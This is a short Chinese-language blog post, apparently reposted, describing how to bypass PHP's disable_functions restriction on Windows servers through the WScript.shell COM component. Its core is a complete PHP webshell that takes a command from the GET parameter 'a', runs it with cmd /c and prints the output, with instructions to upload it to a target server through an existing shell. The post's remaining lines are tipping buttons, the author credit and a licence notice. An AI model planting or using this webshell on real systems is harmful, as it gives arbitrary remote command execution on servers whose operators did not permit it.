WindowsCom组件绕过disable_function的方法 转 发表于 2019-06-03 分类于 安全研究 不明生物: window com组件(php 5.4)(高版本扩展要自己添加) 条件:要在php.ini中开启(如图) 利用代码,利用shell上传如下代码到目标服务器上 123456789101112131415<?php$command=$_GET['a'];$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能$exec = $wsh->exec("cmd /c ".$command); // 调用对象方法来执行命令$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?> 利用成功后的结果 原文:PHP Webshell下绕过disable_function的方法 关注作者公众号,获取更多资源! 赏作者一杯咖啡~ 赏 微信支付 支付宝 本文作者: Mr.Gou 本文链接: https://ya2.top/articles/WindowsCom组件绕过disable_function的方法/ 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-ND 许可协议。转载请注明出处!